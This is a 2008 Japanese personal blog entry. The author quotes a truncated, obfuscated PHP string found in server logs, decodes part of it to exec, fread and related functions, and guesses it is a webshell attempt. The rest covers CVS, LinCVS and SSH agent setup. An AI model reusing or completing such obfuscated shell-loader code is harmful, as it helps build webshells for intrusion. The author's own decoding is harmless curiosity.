にっき

2008/09/05 23:27:22

なんだかどたばた


ろぐを見てたら
引用:
<? $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64";
$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65";
$x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";
$x15="ob\137\x65\156d\1
ってすてきにぁゃιぃゆ〜ざえ〜じぇんと見かけたからちょっとでこ〜どしてみたら
$x0e=exec; $x0f=feof; x10=fread; $x11=function_exists;
$x12=is_resource; $x13=join; $x14=ob_get_contents; $x15=ob_end
とちうで切れてるけど exec があるってことはいつものしぇるかにう?(´・ω・`;【みかん
PHP だし short_open_tag on じゃないと動かないしで XSS するにもびみょ〜なようにゃ・・・
よくわかんないからおいといて☆



eclipse が重たすぎてさっぱり開く気しないからこのごろ svn めいんだったけど
また CVS 使えないとなかんじになってきたからいろいろちゃれんぢ・・・
なんだか sourceforge.net がみょ〜に使いにくくなってたけど LinCVS がけっこうよさそうなかんじかなぁ?
いちおう ssh 経由で接続できるようにはなったけど・・・
え〜じぇんとさん通してるのに毎回ぱすわ〜ど聞かれるのはどうすれば回避できるのかにう?
空欄でも通るってことはあとちょっとなのになんだかにう...〆(´ω`;【みかん


こめんと

こめんとする?



 
投稿された内容の著作権はこめんとの投稿者に帰属するっぽいです☆
また,現在 IE6 以下で Sleipnir,Lunascape,Donut じゃないゆ〜ざえ〜じぇんとからの描き込みを制限してますです☆
該当しちゃうかたはてきとうにゆ〜ざえ〜じぇんとを偽装しちゃってくださいです(´ω`;【みかん
さぶこんてんつ
前月 2024年 4月 翌月
  1
 
2
 
3
 
4
 
5
 
6
 
7
 
8
 
9
 
10
 
11
 
12
 
13
 
14
 
15
 
16
 
17
 
18
 
19
 
20
 
21
 
22
 
23
 
24
 
25
 
26
 
27
 
28
 
29
 
30
 
       
             
  • あじ あじ
  • ED ED
  • えでん えでん
  • えれふぃ えれふぃ
  • ぐらぶれ ぐらぶれ
  • etc etc
  • にっき にっき

あわせて読みたい

先頭に戻る
めにう 先頭に戻る